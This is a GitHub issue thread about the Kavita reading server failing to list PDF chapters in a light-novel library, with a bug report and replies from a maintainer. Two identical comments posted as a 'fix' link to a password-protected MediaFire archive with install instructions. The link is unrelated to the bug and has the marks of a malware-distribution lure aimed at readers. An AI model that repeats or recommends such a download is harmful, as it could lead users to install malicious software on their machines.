### ISSUE TITLE
Chapters not listed correctly

### ISSUE THREAD

**Issue by neroes** [Kareadita/Kavita#3148]
### What happened?

When scanning book where each chapter is a separate pdf file named with the format <series name>/<series name> Chapter ## it doesn't show the chapters in the UI, pressing the read
 button will read the next chapter
![image](https://github.com/user-attachments/assets/088d47b9-b762-4e57-8618-eec101c37b8a)
![image](https://github.com/user-attachments/assets/cabf89ab-c298-47b4-90ae-a0c5af763c32)
![image](https://github.com/user-attachments/assets/7a24d3bd-b555-4855-973e-4c3942f108f0)

### What did you expect?

Chapters are listed just like volumes or issues would be

### Kavita Version Number - If you don not see your version number listed, please update Kavita and see if your issue still persists.

0.8.2 - Stable

### What operating system is Kavita being hosted from?

Docker (Dockerhub Container)

### If the issue is being seen on Desktop, what OS are you running where you see the issue?

Windows

### If the issue is being seen in the UI, what browsers are you seeing the problem on?

Firefox

### If the issue is being seen on Mobile, what OS are you running where you see the issue?

None

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by majora2007** [comment]
What is the library type?

**Comment by neroes** [comment]
> What is the library type?

Light novel

**Comment by majora2007** [comment]
Thanks. I'll take a look at it after my holiday, so expect about 2 weeks. If you join the discord however, users in there could probably help you make some tweaks and get it working. I'm not sure exactly the issue, but the only thing I can think of is perhaps there's some parsing issue with the chapter and instead we need to use a - or something like that.

**Comment by neroes** [comment]
@majora2007 thanks already did, and they asked me to make a bug report and suggested I could in the meantime name them book or volume instead

I'm also going on vacation come Friday so I might not respond to further questions for a while
